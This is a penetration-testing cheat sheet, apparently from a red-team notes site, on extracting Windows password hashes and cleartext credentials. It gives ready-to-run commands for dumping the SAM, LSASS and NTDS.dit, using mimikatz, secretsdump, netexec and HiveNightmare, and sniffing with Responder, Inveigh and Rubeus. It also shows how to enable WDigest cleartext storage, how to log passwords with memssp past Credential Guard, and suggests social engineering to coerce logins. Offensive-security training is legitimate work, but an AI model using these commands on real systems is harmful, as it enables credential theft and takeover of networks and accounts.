# Extract Hash & Password ## Information
DatabaseSAM (Security Account Manager)
Hash formatLM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total)
NTLM (MD4)
Authentication protocolsNTLMv1 (uses LM and NTLM hashes)
NTLMv2 (uses NTLM hashes)
Kerberos
ProcessLSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.
Implements LSA (Local Security Authority).
NTDS.ditEach Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)
### SAM Hashes To extract hashes from the SAM database we need: * Administrator Privileges * `hklm\sam` contains the password hashes. * `hklm\system` contains the bootkey needed to decrypt the SAM db. * `hklm\security` contains cached credentials for domain accounts. (`C:\\Windows\System32\Config\`) {% tabs %} {% tab title="Get File" %} Create copies for transfer {% code overflow="wrap" %} ```powershell reg.exe save hklm\sam C:\sam.save ``` {% endcode %} {% code overflow="wrap" %} ```powershell reg.exe save hklm\system C:\system.save ``` {% endcode %} {% code overflow="wrap" %} ```powershell reg.exe save hklm\security C:\security.save ``` {% endcode %} {% endtab %} {% tab title="Extract" %} Extracting hashes from the SAM database in offline mode by having the files.\ Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). {% code overflow="wrap" %} ```bash secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL ``` {% endcode %} {% endtab %} {% endtabs %} ### LSASS Hashes To extract hashes from the LSASS process we need: * Administrator Privileges * Dump of the running process {% tabs %} {% tab title="Get File" %} Create a copy for transfer {% code overflow="wrap" %} ``` Task Manager > Right-click on LSAProcess > Create dump file ``` {% endcode %} Or {% code overflow="wrap" %} ```powershell tasklist /svc or Get-Process lsass # get PID LSASS ``` {% endcode %} {% code overflow="wrap" %} ```powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump C:\lsass.dump full ``` {% endcode %} {% endtab %} {% tab title="Extract" %} Extracting hashes from the LSASS process dump in offline mode by having the files.\ For example, with administrator privileges, from the Task Manager, go to the “Details” tab, find lsass.exe, right-click, and select “Create dump file.” Use [pypykatz](https://github.com/skelsec/pypykatz). {% code overflow="wrap" %} ```bash pypykatz lsa minidump lsass.dump ``` {% endcode %} {% endtab %} {% endtabs %} ### NTDS Hashes To extract hashes from the `NTDS.dit` file we need:: * Connect to a Domain Controller * Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent) * `hklm\system` contains the bootkey needed for decryption {% tabs %} {% tab title="Get File" %} Create a copy for transfer {% code overflow="wrap" %} ```powershell vssadmin CREATE SHADOW /For=C: ``` {% endcode %} Or {% code overflow="wrap" %} ```powershell vshadow.exe -nw -p C: # get PATH ``` {% endcode %} {% code overflow="wrap" %} ```powershell cmd.exe /c copy \Windows\NTDS\NTDS.dit c:\NTDS.dit ``` {% endcode %} {% endtab %} {% tab title="Extract" %} Extract hashes from NTDS.dit file offline, having the files.\ Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). {% code overflow="wrap" %} ```bash secretsdump.py -ntds NTDS.dit -system system.save LOCAL ``` {% endcode %} {% endtab %} {% endtabs %} ## Tools
ToolDetails
netexecRemotly
nxc smb <IP> [--local-auth] -u <USER> -p <PASS> --sam --lsa -M lsassy
nxc smb <IP_DC> -u <USER> -p <PASS> --ntds
mimikatz

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

> privilege::debug -> token::elevate
> lsadump::sam
> lsadump::lsa
> lsadump::secrets
> vault::cred
> sekurlsa::credman
> sekurlsa::logonpasswords full (see UseLogonCredential Registry Key )

Guide HERE and for all moduls see HERE.
For Meterpreter RevShell: load kiwie
No-interactive shell: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

impacket-secretsdumpsecretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>
HiveNightmareCreate a copy of the SAM files, System, Security from any user even unprivileged.
CVE-2021-36934 - SeriousSam
.\HiveNightmare.exe
## Sniffing
ToolDetails
responderLinux
sudo responder -I <INTERFACE>
sudo responder -I <INTERFACE> -A (passive analysis mode)
See /usr/share/responder/logs
InveighWindows
PowerShell version (no longer maintained)
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
C# version
.\Inveigh.exe
[ESC] > HELP
rubeus

Windows (sniff TGT and TGS, usefull on services account)
Requires elevated privileges
Rubeus.exe monitor /interval:1 /nowrap
Save output in file "ticket.bs4.kirbi" then
cat ticket.bs4.kirbi | base64 -d > ticket.kirbi

ticketConverter.py ticket.kirbi user.ccache

If we have access to the target we can use `net use \\share` ## Other ### UseLogonCredential Registry Key We need to enable that Registry Key UseLogonCredential to be able to extract Clear Password {% code overflow="wrap" %} ```powershell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 ``` {% endcode %} And reboot ``` shutdown /r /t 0 /f ``` ### Store Password using Reversible Encryption When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent.\ Tools such as [impacket-secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as [DCSync](https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/dc-synchronization). Enumeration {% code overflow="wrap" %} ```powershell Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl ``` {% endcode %} With PowerView ([Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) {% code overflow="wrap" %} ```powershell Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol ``` {% endcode %} ### [Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/how-it-works) When enabled, the *Local Security Authority (LSASS)* environment runs as a trustlet in VTL1 ([VSM](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) Secure Mode) named *LSAISO.exe (LSA Isolated)* and communicates with the **LSASS.exe** process running in VTL0 ([VSM](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) Normal Mode) through an RCP channel. This means that the data is encrypted. Credential Guard is only designed to protect non-local users. {% code overflow="wrap" %} ```powershell Get-ComputerInfo # CredentialGuard in DeviceGuardSecurityServicesConfigured DeviceGuardSecurityServicesRunning ``` {% endcode %} With [mimikatz](https://github.com/gentilkiwi/mimikatz) {% code overflow="wrap" %} ```powershell privilege::debug misc::memssp # OUTPUT IN C:\Windows\System32\mimilsa.log ``` {% endcode %} Now we can be patient and wait for another user to remotely connect to the machine or we can resort to additional techniques such as social engineering to coerce someone to log in.